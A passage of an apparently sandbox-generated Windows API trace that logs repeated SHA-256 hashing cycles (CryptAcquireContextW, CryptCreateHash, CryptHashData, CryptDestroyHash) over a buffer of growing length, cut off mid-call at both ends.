Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.659] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0119.659] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.659] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c440, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c440, pdwDataLen=0xce59c) returned 1 [0119.659] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.659] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.659] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.660] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.660] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0119.660] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.660] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c980, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c980, pdwDataLen=0xce59c) returned 1 [0119.660] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.660] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.660] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.661] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.661] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0119.661] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.661] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c860, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c860, pdwDataLen=0xce59c) returned 1 [0119.661] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.661] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.661] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.661] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.661] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0119.661] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.661] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c470, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c470, pdwDataLen=0xce59c) returned 1 [0119.661] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.661] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.661] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.662] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.662] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0119.662] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.662] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c890, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c890, pdwDataLen=0xce59c) returned 1 [0119.662] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.662] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.662] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.663] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.663] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0119.663] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.663] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c4a0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c4a0, pdwDataLen=0xce59c) returned 1 [0119.663] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.663] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.663] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.663] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.663] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0119.663] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.663] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c9b0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c9b0, pdwDataLen=0xce59c) returned 1 [0119.664] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.664] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.664] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.664] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.664] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0119.664] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.664] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c9e0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c9e0, pdwDataLen=0xce59c) returned 1 [0119.664] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.664] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.664] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.665] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.665] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0119.665] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.665] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c4d0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c4d0, pdwDataLen=0xce59c) returned 1 [0119.665] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.665] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.665] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.665] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.665] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0119.665] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.665] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4ca10, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4ca10, pdwDataLen=0xce59c) returned 1 [0119.666] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.666] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.666] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.666] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.666] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0119.666] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.666] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4ca40, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4ca40, pdwDataLen=0xce59c) returned 1 [0119.666] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.666] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.666] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.667] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.667] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0119.667] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.667] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c500, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c500, pdwDataLen=0xce59c) returned 1 [0119.667] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.667] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.667] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.667] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.667] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0119.667] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.667] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4be70, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4be70, pdwDataLen=0xce59c) returned 1 [0119.667] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.667] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.667] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.668] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.668] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0119.668] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.668] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bea0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bea0, pdwDataLen=0xce59c) returned 1 [0119.668] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.668] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.668] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.669] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.669] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0119.669] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.669] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bed0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bed0, pdwDataLen=0xce59c) returned 1 [0119.669] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.669] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.669] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.669] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.669] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0119.669] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.669] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bf00, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bf00, pdwDataLen=0xce59c) returned 1 [0119.669] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.669] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.669] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.670] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.670] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0119.670] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.670] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bf30, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bf30, pdwDataLen=0xce59c) returned 1 [0119.670] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.670] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.670] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.671] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.671] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0119.671] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.671] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bf60, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bf60, pdwDataLen=0xce59c) returned 1 [0119.671] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.671] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.671] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.671] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.671] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0119.671] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.671] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bf90, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bf90, pdwDataLen=0xce59c) returned 1 [0119.672] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.672] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.672] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.672] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.672] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0119.672] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.672] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bfc0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bfc0, pdwDataLen=0xce59c) returned 1 [0119.672] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.672] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.672] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.673] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.673] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0119.673] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.673] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bff0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bff0, pdwDataLen=0xce59c) returned 1 [0119.673] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.673] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.673] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.673] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.674] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0119.674] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.674] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.674] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.674] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.674] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.674] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0119.674] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.674] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.674] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.675] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.675] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0119.675] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.675] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.675] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.676] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.676] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0119.676] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.676] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.676] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a600 | out: hHeap=0x2150000) returned 1 [0119.676] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.677] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.677] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x20, dwFlags=0x0) returned 1 [0119.677] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.677] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.677] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.677] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.677] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x40, dwFlags=0x0) returned 1 [0119.677] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.677] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.677] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.678] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.678] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x60, dwFlags=0x0) returned 1 [0119.678] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.678] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.678] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.678] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.678] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x80, dwFlags=0x0) returned 1 [0119.678] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.678] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.679] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.679] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.679] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0119.679] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.679] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.679] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.680] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.680] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0119.680] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.680] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.680] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.680] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.680] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0119.680] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.681] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.681] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.681] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.681] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x100, dwFlags=0x0) returned 1 [0119.681] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.681] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.681] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, 